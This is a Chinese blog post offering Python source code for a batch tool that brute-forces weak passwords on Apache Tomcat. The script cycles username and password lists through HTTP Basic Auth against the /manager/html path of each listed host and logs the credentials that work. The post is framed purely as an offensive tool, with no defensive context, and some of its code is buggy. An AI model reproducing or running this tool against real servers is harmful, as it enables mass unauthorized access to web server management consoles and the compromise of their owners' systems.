tomcat批量弱口令爆破工具(py版)附带源码

 

#!/usr/bin/env python 
 # -*- coding: utf-8 -*- 
 import sys 
 import requests 
 import threading 
 import Queue 
 import time 
 import base64 
 import os 
 #headers = {'Content-Type': 'application/x-www-form-urlencoded','User-Agent': 'Googlebot/2.1 (+[url]http://www.googlebot.com/bot.html[/url])'} 
 u=Queue.Queue() 
 p=Queue.Queue() 
 n=Queue.Queue() 
 #def urllist() 
 urls=open('url.txt','r') 
 def urllist(): 
     for url in urls: 
         url=url.rstrip() 
         u.put(url) 
 def namelist(): 
     names=open('name.txt','r') 
     for name in names: 
         name=name.rstrip() 
         n.put(name) 
    
 def passlist(): 
     passwds=open('pass.txt','r') 
     for passwd in passwds: 
         passwd=passwd.rstrip() 
         p.put(passwd) 
    
 def weakpass(url): 
     namelist() 
     while not n.empty(): 
         name =n.get() 
         #print name 
         passlist() 
         while not p.empty(): 
             good() 
             #name = n.get() 
             passwd = p.get() 
             #print passwd 
             headers = {'Authorization': 'Basic %s==' % (base64.b64encode(name+':'+passwd))} 
             try: 
                 r =requests.get(url,headers=headers,timeout=3) 
                 #print r.status_code 
                 if r.status_code==200: 
                     print '[turn] ' +url+' '+name+':'+passwd 
                     f = open('good.txt','a+') 
                     f.write(url+' '+name+':'+passwd+'\n') 
                     f.close() 
                 else: 
                     print '[false] ' + url+' '+name+':'+passwd 
             except: 
                 print '[false] '  + url+' '+name+':'+passwd 
    
 def list(): 
     while u.empty(): 
         url = u.get() 
         weakpass(name,url) 
    
 def thread(): 
     urllist() 
     tsk=[] 
     for i in open('url.txt').read().split('\n'): 
         i = i + '/manager/html' 
         t = threading.Thread(target=weakpass,args=(i,)) 
         tsk.append(t) 
     for t in tsk: 
         t.start() 
         t.join(1) 
         #print "current has %d threads" % (threading.activeCount() - 1) 
 def good(): 
     good_ = 0 
     for i in open('good.txt').read().split('\n'): 
         good_+=1 
     os.system('title "weakpass------good:%s"' % (good_)) 
    
 if __name__=="__main__": 
    # alllist() 
     thread() 

 

本博客所有文章如无特别注明均为原创。作者:颓废复制或转载请以超链接形式注明转自 颓废's Blog
原文地址《tomcat批量弱口令爆破工具(py版)附带源码
分享到:更多

相关推荐


版权所有:《颓废's Blog》 => 《tomcat批量弱口令爆破工具(py版)附带源码
本文地址:http://www.0dayhack.com/post-104.html
除非注明,文章均为 《颓废's Blog》 原创,欢迎转载!转载请注明本文地址,谢谢。

分享本文至:

发表评论

路人甲 表情
Ctrl+Enter快速提交

网友评论(0)